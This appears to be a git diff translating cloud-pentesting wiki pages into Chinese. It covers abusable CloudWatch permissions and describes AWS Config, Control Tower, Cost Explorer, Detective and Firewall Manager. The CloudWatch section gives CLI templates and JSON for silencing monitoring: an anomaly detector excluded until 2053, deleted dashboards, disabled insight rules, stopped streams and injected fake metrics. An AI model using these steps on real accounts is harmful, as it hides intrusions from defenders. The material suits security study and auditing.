aws cloudwatch delete-anomaly-detector [--cli-input-json | --namespace --metric-name --dimensions --stat ] aws cloudwatch put-anomaly-detector [--cli-input-json | --namespace --metric-name --dimensions --stat --configuration --metric-characteristics ] ``` - -The following example shows how to make a metric anomaly detector ineffective. This metric anomaly detector monitors the average CPU utilization of a specific EC2 instance, and just by adding the “ExcludedTimeRanges” parameter with the desired time range, it would be enough to ensure that the anomaly detector does not analyze or alert on any relevant data during that period. +以下示例展示了如何使指标异常检测器失效。该指标异常检测器监控特定 EC2 实例的平均 CPU 利用率,只需添加“ExcludedTimeRanges”参数和所需的时间范围,就足以确保异常检测器在该期间内不分析或警报任何相关数据。 {{#tabs }} {{#tab name="Original Metric Anomaly Detector" }} - ```json { - "SingleMetricAnomalyDetector": { - "Namespace": "AWS/EC2", - "MetricName": "CPUUtilization", - "Stat": "Average", - "Dimensions": [ - { - "Name": "InstanceId", - "Value": "i-0123456789abcdefg" - } - ] - } +"SingleMetricAnomalyDetector": { +"Namespace": "AWS/EC2", +"MetricName": "CPUUtilization", +"Stat": "Average", +"Dimensions": [ +{ +"Name": "InstanceId", +"Value": "i-0123456789abcdefg" +} +] +} } ``` - {{#endtab }} -{{#tab name="Modified Metric Anomaly Detector" }} - +{{#tab name="修改后的指标异常检测器" }} ```json { - "SingleMetricAnomalyDetector": { - "Namespace": "AWS/EC2", - "MetricName": "CPUUtilization", - "Stat": "Average", - "Dimensions": [ - { - "Name": "InstanceId", - "Value": "i-0123456789abcdefg" - } - ] - }, - "Configuration": { - "ExcludedTimeRanges": [ - { - "StartTime": "2023-01-01T00:00:00Z", - "EndTime": "2053-01-01T23:59:59Z" - } - ], - "Timezone": "Europe/Madrid" - } +"SingleMetricAnomalyDetector": { +"Namespace": "AWS/EC2", +"MetricName": "CPUUtilization", +"Stat": "Average", +"Dimensions": [ +{ +"Name": "InstanceId", +"Value": "i-0123456789abcdefg" +} +] +}, +"Configuration": { +"ExcludedTimeRanges": [ +{ +"StartTime": "2023-01-01T00:00:00Z", +"EndTime": "2053-01-01T23:59:59Z" +} +], +"Timezone": "Europe/Madrid" +} } ``` - {{#endtab }} {{#endtabs }} -**Potential Impact**: Direct effect in the detection of unusual patterns or security threats. +**潜在影响**:直接影响检测异常模式或安全威胁。 ### **`cloudwatch:DeleteDashboards`, `cloudwatch:PutDashboard`** -An attacker would be able to compromise the monitoring and visualization capabilities of an organization by creating, modifying or deleting its dashboards. This permissions could be leveraged to remove critical visibility into the performance and health of systems, alter dashboards to display incorrect data or hide malicious activities. - +攻击者可以通过创建、修改或删除仪表板来破坏组织的监控和可视化能力。这些权限可以被利用来移除对系统性能和健康的关键可见性,修改仪表板以显示不正确的数据或隐藏恶意活动。 ```bash aws cloudwatch delete-dashboards --dashboard-names aws cloudwatch put-dashboard --dashboard-name --dashboard-body ``` - -**Potential Impact**: Loss of monitoring visibility and misleading information. +**潜在影响**:失去监控可见性和误导性信息。 ### **`cloudwatch:DeleteInsightRules`, `cloudwatch:PutInsightRule` ,`cloudwatch:PutManagedInsightRule`** -Insight rules are used to detect anomalies, optimize performance, and manage resources effectively. By deleting existing insight rules, an attacker could remove critical monitoring capabilities, leaving the system blind to performance issues and security threats. Additionally, an attacker could create or modify insight rules to generate misleading data or hide malicious activities, leading to incorrect diagnostics and inappropriate responses from the operations team. - +Insight 规则用于检测异常、优化性能和有效管理资源。通过删除现有的 insight 规则,攻击者可以移除关键的监控能力,使系统对性能问题和安全威胁失去感知。此外,攻击者可以创建或修改 insight 规则,以生成误导性数据或隐藏恶意活动,从而导致错误的诊断和运营团队的不当响应。 ```bash aws cloudwatch delete-insight-rules --rule-names aws cloudwatch put-insight-rule --rule-name --rule-definition [--rule-state ] aws cloudwatch put-managed-insight-rules --managed-rules ``` - -**Potential Impact**: Difficulty to detect and respond to performance issues and anomalies, misinformed decision-making and potentially hiding malicious activities or system failures. +**潜在影响**:难以检测和响应性能问题和异常,错误的信息决策,可能掩盖恶意活动或系统故障。 ### **`cloudwatch:DisableInsightRules`, `cloudwatch:EnableInsightRules`** -By disabling critical insight rules, an attacker could effectively blind the organization to key performance and security metrics. Conversely, by enabling or configuring misleading rules, it could be possible to generate false data, create noise, or hide malicious activity. - +通过禁用关键的洞察规则,攻击者可以有效地使组织对关键性能和安全指标失去警觉。相反,通过启用或配置误导性规则,可能会生成虚假数据,制造噪音,或掩盖恶意活动。 ```bash aws cloudwatch disable-insight-rules --rule-names aws cloudwatch enable-insight-rules --rule-names ``` - -**Potential Impact**: Confusion among the operations team, leading to delayed responses to actual issues and unnecessary actions based on false alerts. +**潜在影响**:操作团队之间的混淆,导致对实际问题的响应延迟以及基于错误警报的不必要行动。 ### **`cloudwatch:DeleteMetricStream` , `cloudwatch:PutMetricStream` , `cloudwatch:PutMetricData`** -An attacker with the **`cloudwatch:DeleteMetricStream`** , **`cloudwatch:PutMetricStream`** permissions would be able to create and delete metric data streams, compromising the security, monitoring and data integrity: +拥有 **`cloudwatch:DeleteMetricStream`** 和 **`cloudwatch:PutMetricStream`** 权限的攻击者将能够创建和删除指标数据流,从而危及安全性、监控和数据完整性: -- **Create malicious streams**: Create metric streams to send sensitive data to unauthorized destinations. -- **Resource manipulation**: The creation of new metric streams with excessive data could produce a lot of noise, causing incorrect alerts, masking true issues. -- **Monitoring disruption**: Deleting metric streams, attackers would disrupt the continuos flow of monitoring data. This way, their malicious activities would be effectively hidden. - -Similarly, with the **`cloudwatch:PutMetricData`** permission, it would be possible to add data to a metric stream. This could lead to a DoS because of the amount of improper data added, making it completely useless. +- **创建恶意流**:创建指标流以将敏感数据发送到未经授权的目的地。 +- **资源操控**:创建过多数据的新指标流可能会产生大量噪音,导致错误警报,掩盖真实问题。 +- **监控中断**:删除指标流,攻击者将中断监控数据的持续流动。这样,他们的恶意活动将有效隐藏。 +同样,拥有 **`cloudwatch:PutMetricData`** 权限,可以向指标流添加数据。这可能导致由于添加了大量不当数据而造成的拒绝服务,使其完全无用。 ```bash aws cloudwatch delete-metric-stream --name aws cloudwatch put-metric-stream --name [--include-filters ] [--exclude-filters ] --firehose-arn --role-arn --output-format aws cloudwatch put-metric-data --namespace [--metric-data ] [--metric-name ] [--timestamp ] [--unit ] [--value ] [--dimensions ] ``` - -Example of adding data corresponding to a 70% of a CPU utilization over a given EC2 instance: - +在给定的 EC2 实例上添加与 70% CPU 利用率相对应的数据的示例: ```bash aws cloudwatch put-metric-data --namespace "AWS/EC2" --metric-name "CPUUtilization" --value 70 --unit "Percent" --dimensions "InstanceId=i-0123456789abcdefg" ``` - -**Potential Impact**: Disruption in the flow of monitoring data, impacting the detection of anomalies and incidents, resource manipulation and costs increasing due to the creation of excessive metric streams. +**潜在影响**:监控数据流的中断,影响异常和事件的检测,资源操控以及由于创建过多的指标流而导致的成本增加。 ### **`cloudwatch:StopMetricStreams`, `cloudwatch:StartMetricStreams`** -An attacker would control the flow of the affected metric data streams (every data stream if there is no resource restriction). With the permission **`cloudwatch:StopMetricStreams`**, attackers could hide their malicious activities by stopping critical metric streams. - +攻击者将控制受影响的指标数据流的流动(如果没有资源限制,则每个数据流)。通过权限 **`cloudwatch:StopMetricStreams`**,攻击者可以通过停止关键指标流来隐藏他们的恶意活动。 ```bash aws cloudwatch stop-metric-streams --names aws cloudwatch start-metric-streams --names ``` - -**Potential Impact**: Disruption in the flow of monitoring data, impacting the detection of anomalies and incidents. +**潜在影响**:监控数据流的中断,影响异常和事件的检测。 ### **`cloudwatch:TagResource`, `cloudwatch:UntagResource`** -An attacker would be able to add, modify, or remove tags from CloudWatch resources (currently only alarms and Contributor Insights rules). This could disrupting your organization's access control policies based on tags. - +攻击者将能够添加、修改或删除CloudWatch资源的标签(目前仅限于警报和贡献者洞察规则)。这可能会破坏您组织基于标签的访问控制策略。 ```bash aws cloudwatch tag-resource --resource-arn --tags aws cloudwatch untag-resource --resource-arn --tag-keys ``` +**潜在影响**:中断基于标签的访问控制策略。 -**Potential Impact**: Disruption of tag-based access control policies. - -## References +## 参考文献 - [https://cloudsecdocs.com/aws/services/logging/cloudwatch/](https://cloudsecdocs.com/aws/services/logging/cloudwatch/#general-info) - [https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoncloudwatch.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoncloudwatch.html) - [https://docs.aws.amazon.com/es_es/AmazonCloudWatch/latest/monitoring/cloudwatch_concepts.html#Metric](https://docs.aws.amazon.com/es_es/AmazonCloudWatch/latest/monitoring/cloudwatch_concepts.html#Metric) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md index f2ab3c4c5..e6b59397c 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md @@ -4,47 +4,43 @@ ## AWS Config -AWS Config **capture resource changes**, so any change to a resource supported by Config can be recorded, which will **record what changed along with other useful metadata, all held within a file known as a configuration item**, a CI. This service is **region specific**. +AWS Config **捕获资源变化**,因此任何由 Config 支持的资源的变化都可以被记录,这将 **记录变化的内容以及其他有用的元数据,所有这些都保存在一个称为配置项的文件中**,即 CI。该服务是 **区域特定的**。 -A configuration item or **CI** as it's known, is a key component of AWS Config. It is comprised of a JSON file that **holds the configuration information, relationship information and other metadata as a point-in-time snapshot view of a supported resource**. All the information that AWS Config can record for a resource is captured within the CI. A CI is created **every time** a supported resource has a change made to its configuration in any way. In addition to recording the details of the affected resource, AWS Config will also record CIs for any directly related resources to ensure the change did not affect those resources too. +配置项或 **CI**,是 AWS Config 的一个关键组成部分。它由一个 JSON 文件组成,**包含配置信息、关系信息和其他元数据,作为受支持资源的时间点快照视图**。AWS Config 可以为资源记录的所有信息都包含在 CI 中。每当受支持的资源的配置以任何方式发生变化时,都会创建一个 CI。除了记录受影响资源的详细信息外,AWS Config 还会记录任何直接相关资源的 CI,以确保变化没有影响到这些资源。 -- **Metadata**: Contains details about the configuration item itself. A version ID and a configuration ID, which uniquely identifies the CI. Ither information can include a MD5Hash that allows you to compare other CIs already recorded against the same resource. -- **Attributes**: This holds common **attribute information against the actual resource**. Within this section, we also have a unique resource ID, and any key value tags that are associated to the resource. The resource type is also listed. For example, if this was a CI for an EC2 instance, the resource types listed could be the network interface, or the elastic IP address for that EC2 instance -- **Relationships**: This holds information for any connected **relationship that the resource may have**. So within this section, it would show a clear description of any relationship to other resources that this resource had. For example, if the CI was for an EC2 instance, the relationship section may show the connection to a VPC along with the subnet that the EC2 instance resides in. -- **Current configuration:** This will display the same information that would be generated if you were to perform a describe or list API call made by the AWS CLI. AWS Config uses the same API calls to get the same information. -- **Related events**: This relates to AWS CloudTrail. This will display the **AWS CloudTrail event ID that is related to the change that triggered the creation of this CI**. There is a new CI made for every change made against a resource. As a result, different CloudTrail event IDs will be created. +- **元数据**:包含有关配置项本身的详细信息。版本 ID 和配置 ID,唯一标识 CI。其他信息可以包括一个 MD5Hash,允许您将已记录的其他 CI 与同一资源进行比较。 +- **属性**:这包含与实际资源相关的常见 **属性信息**。在此部分中,我们还具有唯一的资源 ID,以及与资源相关的任何关键值标签。资源类型也会列出。例如,如果这是一个 EC2 实例的 CI,列出的资源类型可能是网络接口或该 EC2 实例的弹性 IP 地址。 +- **关系**:这包含资源可能具有的任何连接 **关系的信息**。因此,在此部分中,它将清楚地描述该资源与其他资源之间的任何关系。例如,如果 CI 是针对 EC2 实例的,关系部分可能会显示与 VPC 的连接以及 EC2 实例所在的子网。 +- **当前配置**:这将显示如果您执行 AWS CLI 的描述或列出 API 调用时生成的相同信息。AWS Config 使用相同的 API 调用来获取相同的信息。 +- **相关事件**:这与 AWS CloudTrail 相关。这将显示 **与触发此 CI 创建的变化相关的 AWS CloudTrail 事件 ID**。每次对资源进行更改时,都会创建一个新的 CI。因此,将创建不同的 CloudTrail 事件 ID。 -**Configuration History**: It's possible to obtain the configuration history of resources thanks to the configurations items. A configuration history is delivered every 6 hours and contains all CI's for a particular resource type. +**配置历史**:得益于配置项,可以获取资源的配置历史。配置历史每 6 小时交付一次,包含特定资源类型的所有 CI。 -**Configuration Streams**: Configuration items are sent to an SNS Topic to enable analysis of the data. +**配置流**:配置项被发送到 SNS 主题,以便对数据进行分析。 -**Configuration Snapshots**: Configuration items are used to create a point in time snapshot of all supported resources. +**配置快照**:配置项用于创建所有受支持资源的时间点快照。 -**S3 is used to store** the Configuration History files and any Configuration snapshots of your data within a single bucket, which is defined within the Configuration recorder. If you have multiple AWS accounts you may want to aggregate your configuration history files into the same S3 bucket for your primary account. However, you'll need to grant write access for this service principle, config.amazonaws.com, and your secondary accounts with write access to the S3 bucket in your primary account. +**S3 用于存储** 配置历史文件和您数据的任何配置快照,所有这些都在一个单一的存储桶中,该存储桶在配置记录器中定义。如果您有多个 AWS 账户,您可能希望将配置历史文件聚合到主账户的同一个 S3 存储桶中。但是,您需要为此服务原则 config.amazonaws.com 授予写入访问权限,并为您的次要账户授予对主账户 S3 存储桶的写入访问权限。 -### Functioning +### 功能 -- When make changes, for example to security group or bucket access control list —> fire off as an Event picked up by AWS Config -- Stores everything in S3 bucket -- Depending on the setup, as soon as something changes it could trigger a lambda function OR schedule lambda function to periodically look through the AWS Config settings -- Lambda feeds back to Config -- If rule has been broken, Config fires up an SNS +- 当进行更改时,例如对安全组或存储桶访问控制列表进行更改 —> 触发 AWS Config 捕获的事件 +- 将所有内容存储在 S3 存储桶中 +- 根据设置,一旦发生变化,可能会触发一个 lambda 函数,或定期调度 lambda 函数查看 AWS Config 设置 +- Lambda 将反馈给 Config +- 如果规则被违反,Config 会触发 SNS ![](<../../../../images/image (126).png>) -### Config Rules +### Config 规则 -Config rules are a great way to help you **enforce specific compliance checks** **and controls across your resources**, and allows you to adopt an ideal deployment specification for each of your resource types. Each rule **is essentially a lambda function** that when called upon evaluates the resource and carries out some simple logic to determine the compliance result with the rule. **Each time a change is made** to one of your supported resources, **AWS Config will check the compliance against any config rules that you have in place**.\ -AWS have a number of **predefined rules** that fall under the security umbrella that are ready to use. For example, Rds-storage-encrypted. This checks whether storage encryption is activated by your RDS database instances. Encrypted-volumes. This checks to see if any EBS volumes that have an attached state are encrypted. +Config 规则是帮助您 **在资源之间强制特定合规检查** **和控制的好方法**,并允许您为每种资源类型采用理想的部署规范。每个规则 **本质上是一个 lambda 函数**,在调用时评估资源并执行一些简单逻辑以确定与规则的合规结果。**每次对您的受支持资源进行更改时,AWS Config 将检查与您已设置的任何配置规则的合规性**。\ +AWS 有许多 **预定义规则**,属于安全范围,随时可用。例如,Rds-storage-encrypted。此规则检查您的 RDS 数据库实例是否启用了存储加密。Encrypted-volumes。此规则检查是否有任何附加状态的 EBS 卷被加密。 -- **AWS Managed rules**: Set of predefined rules that cover a lot of best practices, so it's always worth browsing these rules first before setting up your own as there is a chance that the rule may already exist. -- **Custom rules**: You can create your own rules to check specific customconfigurations. +- **AWS 管理规则**:一组预定义规则,涵盖许多最佳实践,因此在设置自己的规则之前,浏览这些规则总是值得的,因为规则可能已经存在。 +- **自定义规则**:您可以创建自己的规则以检查特定的自定义配置。 -Limit of 50 config rules per region before you need to contact AWS for an increase.\ -Non compliant results are NOT deleted. +每个区域限制 50 个配置规则,之后您需要联系 AWS 以增加配额。\ +不合规的结果不会被删除。 {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md index 9fab39fb8..0cdeb76b4 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md @@ -5,42 +5,36 @@ ## Control Tower > [!NOTE] -> In summary, Control Tower is a service that allows to define policies for all your accounts inside your org. So instead of managing each of the you can set policies from Control Tower that will be applied on them. +> 总之,Control Tower 是一个允许您为组织内所有账户定义策略的服务。因此,您可以从 Control Tower 设置策略,而不是管理每一个账户,这些策略将应用于它们。 -AWS Control Tower is a **service provided by Amazon Web Services (AWS)** that enables organizations to set up and govern a secure, compliant, multi-account environment in AWS. +AWS Control Tower 是 **由亚马逊网络服务(AWS)提供的服务**,使组织能够在 AWS 中设置和管理一个安全、合规的多账户环境。 -AWS Control Tower provides a **pre-defined set of best-practice blueprints** that can be customized to meet specific **organizational requirements**. These blueprints include pre-configured AWS services and features, such as AWS Single Sign-On (SSO), AWS Config, AWS CloudTrail, and AWS Service Catalog. +AWS Control Tower 提供了一套 **预定义的最佳实践蓝图**,可以根据特定的 **组织需求** 进行定制。这些蓝图包括预配置的 AWS 服务和功能,如 AWS 单点登录(SSO)、AWS Config、AWS CloudTrail 和 AWS 服务目录。 -With AWS Control Tower, administrators can quickly set up a **multi-account environment that meets organizational requirements**, such as **security** and compliance. The service provides a central dashboard to view and manage accounts and resources, and it also automates the provisioning of accounts, services, and policies. +通过 AWS Control Tower,管理员可以快速设置一个 **满足组织需求的多账户环境**,例如 **安全性** 和合规性。该服务提供一个中央仪表板,以查看和管理账户和资源,并自动化账户、服务和政策的配置。 -In addition, AWS Control Tower provides guardrails, which are a set of pre-configured policies that ensure the environment remains compliant with organizational requirements. These policies can be customized to meet specific needs. +此外,AWS Control Tower 提供了保护措施,这是一组预配置的政策,确保环境保持符合组织要求。这些政策可以根据特定需求进行定制。 -Overall, AWS Control Tower simplifies the process of setting up and managing a secure, compliant, multi-account environment in AWS, making it easier for organizations to focus on their core business objectives. +总体而言,AWS Control Tower 简化了在 AWS 中设置和管理安全、合规的多账户环境的过程,使组织更容易专注于其核心业务目标。 ### Enumeration -For enumerating controltower controls, you first need to **have enumerated the org**: +要枚举 controltower 控制,您首先需要 **枚举组织**: {{#ref}} ../aws-organizations-enum.md {{#endref}} - ```bash # Get controls applied in an account aws controltower list-enabled-controls --target-identifier arn:aws:organizations:::ou/ ``` - > [!WARNING] -> Control Tower can also use **Account factory** to execute **CloudFormation templates** in **accounts and run services** (privesc, post-exploitation...) in those accounts +> Control Tower 还可以使用 **Account factory** 在 **账户中执行** **CloudFormation 模板** 并在这些账户中运行服务(提权,后期利用...) -### Post Exploitation & Persistence +### 后期利用与持久性 {{#ref}} ../../aws-post-exploitation/aws-control-tower-post-exploitation.md {{#endref}} {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md index 2f967331b..31085b813 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md @@ -2,18 +2,14 @@ {{#include ../../../../banners/hacktricks-training.md}} -## Cost Explorer and Anomaly detection +## 成本探测器和异常检测 -This allows you to check **how are you expending money in AWS services** and help you **detecting anomalies**.\ -Moreover, you can configure an anomaly detection so AWS will warn you when some a**nomaly in costs is found**. +这使您能够检查 **您在 AWS 服务上的支出情况** 并帮助您 **检测异常**。\ +此外,您可以配置异常检测,以便 AWS 在发现 **成本异常** 时警告您。 -### Budgets +### 预算 -Budgets help to **manage costs and usage**. You can get **alerted when a threshold is reached**.\ -Also, they can be used for non cost related monitoring like the usage of a service (how many GB are used in a particular S3 bucket?). +预算有助于 **管理成本和使用情况**。您可以在 **达到阈值时收到警报**。\ +此外,它们还可以用于与成本无关的监控,例如服务的使用情况(特定 S3 存储桶中使用了多少 GB?)。 {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md index 9d1a40eba..2d6783027 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md @@ -4,9 +4,9 @@ ## Detective -**Amazon Detective** streamlines the security investigation process, making it more efficient to **analyze, investigate, and pinpoint the root cause** of security issues or unusual activities. It automates the collection of log data from AWS resources and employs **machine learning, statistical analysis, and graph theory** to construct an interconnected data set. This setup greatly enhances the speed and effectiveness of security investigations. +**亚马逊侦探** 简化了安全调查过程,使 **分析、调查和确定** 安全问题或异常活动的根本原因变得更加高效。它自动收集来自 AWS 资源的日志数据,并利用 **机器学习、统计分析和图论** 构建一个互联的数据集。这种设置大大提高了安全调查的速度和有效性。 -The service eases in-depth exploration of security incidents, allowing security teams to swiftly understand and address the underlying causes of issues. Amazon Detective analyzes vast amounts of data from sources like VPC Flow Logs, AWS CloudTrail, and Amazon GuardDuty. It automatically generates a **comprehensive, interactive view of resources, users, and their interactions over time**. This integrated perspective provides all necessary details and context in one location, enabling teams to discern the reasons behind security findings, examine pertinent historical activities, and rapidly determine the root cause. +该服务简化了对安全事件的深入探索,使安全团队能够迅速理解和解决问题的根本原因。亚马逊侦探分析来自 VPC 流日志、AWS CloudTrail 和亚马逊 GuardDuty 等来源的大量数据。它自动生成 **资源、用户及其随时间的交互的全面互动视图**。这种集成视角提供了所有必要的细节和上下文,使团队能够辨别安全发现背后的原因,检查相关的历史活动,并快速确定根本原因。 ## References @@ -14,7 +14,3 @@ The service eases in-depth exploration of security incidents, allowing security - [https://cloudsecdocs.com/aws/services/logging/other/#detective](https://cloudsecdocs.com/aws/services/logging/other/#detective) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md index 0369f075c..c51922cac 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md @@ -4,80 +4,79 @@ ## Firewall Manager -**AWS Firewall Manager** streamlines the management and maintenance of **AWS WAF, AWS Shield Advanced, Amazon VPC security groups and Network Access Control Lists (ACLs), and AWS Network Firewall, AWS Route 53 Resolver DNS Firewall and third-party firewalls** across multiple accounts and resources. It enables you to configure your firewall rules, Shield Advanced protections, VPC security groups, and Network Firewall settings just once, with the service **automatically enforcing these rules and protections across your accounts and resources**, including newly added ones. +**AWS Firewall Manager** 简化了 **AWS WAF、AWS Shield Advanced、Amazon VPC 安全组和网络访问控制列表 (ACL)、AWS 网络防火墙、AWS Route 53 解析器 DNS 防火墙和第三方防火墙** 在多个账户和资源中的管理和维护。它使您能够仅配置一次防火墙规则、Shield Advanced 保护、VPC 安全组和网络防火墙设置,服务 **会自动在您的账户和资源中强制执行这些规则和保护**,包括新添加的资源。 -The service offers the capability to **group and safeguard specific resources together**, like those sharing a common tag or all your CloudFront distributions. A significant advantage of Firewall Manager is its ability to **automatically extend protection to newly added resources** in your account. +该服务提供了 **将特定资源分组和保护在一起** 的能力,例如共享公共标签的资源或您所有的 CloudFront 分发。Firewall Manager 的一个显著优势是其能够 **自动扩展保护到新添加的资源**。 -A **rule group** (a collection of WAF rules) can be incorporated into an AWS Firewall Manager Policy, which is then linked to specific AWS resources such as CloudFront distributions or application load balancers. +一个 **规则组**(WAF 规则的集合)可以被纳入 AWS Firewall Manager 策略中,然后链接到特定的 AWS 资源,如 CloudFront 分发或应用负载均衡器。 -AWS Firewall Manager provides **managed application and protocol lists** to simplify the configuration and management of security group policies. These lists allow you to define the protocols and applications permitted or denied by your policies. There are two types of managed lists: +AWS Firewall Manager 提供 **托管的应用程序和协议列表**,以简化安全组策略的配置和管理。这些列表允许您定义政策允许或拒绝的协议和应用程序。托管列表有两种类型: -- **Firewall Manager managed lists**: These lists include **FMS-Default-Public-Access-Apps-Allowed**, **FMS-Default-Protocols-Allowed** and **FMS-Default-Protocols-Allowed**. They are managed by Firewall Manager and include commonly used applications and protocols that should be allowed or denied to the general public. It is not possible to edit or delete them, however, you can choose its version. -- **Custom managed lists**: You manage these lists yourself. You can create custom application and protocol lists tailored to your organization's needs. Unlike Firewall Manager managed lists, these lists do not have versions, but you have full control over custom lists, allowing you to create, edit, and delete them as required. +- **Firewall Manager 托管列表**:这些列表包括 **FMS-Default-Public-Access-Apps-Allowed**、**FMS-Default-Protocols-Allowed** 和 **FMS-Default-Protocols-Allowed**。它们由 Firewall Manager 管理,包含应允许或拒绝公众访问的常用应用程序和协议。无法编辑或删除它们,但您可以选择其版本。 +- **自定义托管列表**:您自己管理这些列表。您可以创建符合您组织需求的自定义应用程序和协议列表。与 Firewall Manager 托管列表不同,这些列表没有版本,但您对自定义列表拥有完全控制权,可以根据需要创建、编辑和删除它们。 -It's important to note that **Firewall Manager policies permit only "Block" or "Count" actions** for a rule group, without an "Allow" option. +重要的是要注意,**Firewall Manager 策略仅允许“阻止”或“计数”操作**,没有“允许”选项。 ### Prerequisites -The following prerequisite steps must be completed before proceeding to configure Firewall Manager to begin protecting your organization's resources effectively. These steps provide the foundational setup required for Firewall Manager to enforce security policies and ensure compliance across your AWS environment: +在配置 Firewall Manager 以有效保护您组织的资源之前,必须完成以下先决步骤。这些步骤提供了 Firewall Manager 强制执行安全政策和确保合规性所需的基础设置: -1. **Join and configure AWS Organizations:** Ensure your AWS account is part of the AWS Organizations organization where the AWS Firewall Manager policies are planned to be implanted. This allows for centralized management of resources and policies across multiple AWS accounts within the organization. -2. **Create an AWS Firewall Manager Default Administrator Account:** Establish a default administrator account specifically for managing Firewall Manager security policies. This account will be responsible for configuring and enforcing security policies across the organization. Just the management account of the organization is able to create Firewall Manager default administrator accounts. -3. **Enable AWS Config:** Activate AWS Config to provide Firewall Manager with the necessary configuration data and insights required to effectively enforce security policies. AWS Config helps analyze, audit, monitor and audit resource configurations and changes, facilitating better security management. -4. **For Third-Party Policies, Subscribe in the AWS Marketplace and Configure Third-Party Settings:** If you plan to utilize third-party firewall policies, subscribe to them in the AWS Marketplace and configure the necessary settings. This step ensures that Firewall Manager can integrate and enforce policies from trusted third-party vendors. -5. **For Network Firewall and DNS Firewall Policies, enable resource sharing:** Enable resource sharing specifically for Network Firewall and DNS Firewall policies. This allows Firewall Manager to apply firewall protections to your organization's VPCs and DNS resolution, enhancing network security. -6. **To use AWS Firewall Manager in Regions that are disabled by default:** If you intend to use Firewall Manager in AWS regions that are disabled by default, ensure that you take the necessary steps to enable its functionality in those regions. This ensures consistent security enforcement across all regions where your organization operates. +1. **加入并配置 AWS Organizations**:确保您的 AWS 账户是计划实施 AWS Firewall Manager 策略的 AWS Organizations 组织的一部分。这允许在组织内多个 AWS 账户之间集中管理资源和政策。 +2. **创建 AWS Firewall Manager 默认管理员账户**:建立一个专门用于管理 Firewall Manager 安全策略的默认管理员账户。该账户将负责在组织内配置和强制执行安全策略。只有组织的管理账户能够创建 Firewall Manager 默认管理员账户。 +3. **启用 AWS Config**:激活 AWS Config,以为 Firewall Manager 提供有效强制执行安全策略所需的配置数据和洞察。AWS Config 有助于分析、审计、监控和审计资源配置和更改,促进更好的安全管理。 +4. **对于第三方政策,在 AWS Marketplace 订阅并配置第三方设置**:如果您计划使用第三方防火墙政策,请在 AWS Marketplace 中订阅它们并配置必要的设置。此步骤确保 Firewall Manager 可以集成并强制执行来自受信任第三方供应商的政策。 +5. **对于网络防火墙和 DNS 防火墙政策,启用资源共享**:专门为网络防火墙和 DNS 防火墙政策启用资源共享。这允许 Firewall Manager 将防火墙保护应用于您组织的 VPC 和 DNS 解析,增强网络安全。 +6. **在默认禁用的区域使用 AWS Firewall Manager**:如果您打算在默认禁用的 AWS 区域使用 Firewall Manager,请确保采取必要步骤以启用其在这些区域的功能。这确保在您组织运营的所有区域内一致的安全强制执行。 -For more information, check: [Getting started with AWS Firewall Manager AWS WAF policies](https://docs.aws.amazon.com/waf/latest/developerguide/getting-started-fms.html). +有关更多信息,请查看:[开始使用 AWS Firewall Manager AWS WAF 策略](https://docs.aws.amazon.com/waf/latest/developerguide/getting-started-fms.html)。 ### Types of protection policies -AWS Firewall Manager manages several types of policies to enforce security controls across different aspects of your organization's infrastructure: +AWS Firewall Manager 管理几种类型的政策,以在您组织基础设施的不同方面强制执行安全控制: -1. **AWS WAF Policy:** This policy type supports both AWS WAF and AWS WAF Classic. You can define which resources are protected by the policy. For AWS WAF policies, you can specify sets of rule groups to run first and last in the web ACL. Additionally, account owners can add rules and rule groups to run in between these sets. -2. **Shield Advanced Policy:** This policy applies Shield Advanced protections across your organization for specified resource types. It helps safeguard against DDoS attacks and other threats. -3. **Amazon VPC Security Group Policy:** With this policy, you can manage security groups used throughout your organization, enforcing a baseline set of rules across your AWS environment to control network access. -4. **Amazon VPC Network Access Control List (ACL) Policy:** This policy type gives you control over network ACLs used in your organization, allowing you to enforce a baseline set of network ACLs across your AWS environment. -5. **Network Firewall Policy:** This policy applies AWS Network Firewall protection to your organization's VPCs, enhancing network security by filtering traffic based on predefined rules. -6. **Amazon Route 53 Resolver DNS Firewall Policy:** This policy applies DNS Firewall protections to your organization's VPCs, helping to block malicious domain resolution attempts and enforce security policies for DNS traffic. -7. **Third-Party Firewall Policy:** This policy type applies protections from third-party firewalls, which are available by subscription through the AWS Marketplace console. It allows you to integrate additional security measures from trusted vendors into your AWS environment. - 1. **Palo Alto Networks Cloud NGFW Policy:** This policy applies Palo Alto Networks Cloud Next Generation 